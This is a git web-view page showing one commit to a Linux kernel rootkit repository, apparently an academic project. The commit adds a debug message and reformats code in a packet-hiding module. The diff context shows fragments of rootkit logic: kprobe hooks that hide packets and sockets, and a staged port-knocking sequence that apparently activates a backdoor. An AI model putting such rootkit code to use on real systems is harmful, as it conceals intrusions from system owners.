linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit e589c6703e9f83783c6b7f1e182f8a96ffd2ff64
parent f428f5b8bb95aecf64b48edf68fc32e6e36a6a71
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 13:59:12 +0100

adds debug info

Diffstat:
Msrc/packhide.c | 13+++++++------
1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/src/packhide.c b/src/packhide.c @@ -49,6 +49,7 @@ void hide_packets(void) { if (atomic_inc_return(&packet_rcv_install_count) == 1) { + DEBUG_INFO("HIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets); p_rcv.pre_handler = g7_packet_rcv; p_rcv.post_handler = g7_post; p_rcv.fault_handler = g7_fault; @@ -182,18 +183,18 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs) if (stage3_knock(src_port)) { DEBUG_NOTICE("[g7] knocked port %d, port knocking sequence completed\n", src_port); add_knock_to_list(&ips_stage3_tail, ip, version); - } else { - DEBUG_NOTICE("[g7] failed entering knock stage 3, incorrect port knocked (%d) - resetting knock progress\n", src_port); - } + } else + DEBUG_NOTICE("[g7] failed entering knock stage 3, incorrect port knocked (%d)" + " - resetting knock progress\n", src_port); remove_knock_from_list(&ips_stage2, &ips_stage2_tail, ip, version); } else if (list_contains_knock(&ips_stage1, ip, version)) { if (stage2_knock(src_port)) { add_knock_to_list(&ips_stage2_tail, ip, version); DEBUG_NOTICE("[g7] knocked port %d, entering knocking stage 2\n", src_port); - } else { - DEBUG_NOTICE("[g7] failed entering knock stage 2, incorrect port knocked (%d) - resetting knock progress\n", src_port); - } + } else + DEBUG_NOTICE("[g7] failed entering knock stage 2, incorrect port knocked (%d)" + " - resetting knock progress\n", src_port); remove_knock_from_list(&ips_stage1, &ips_stage1_tail, ip, version); } else {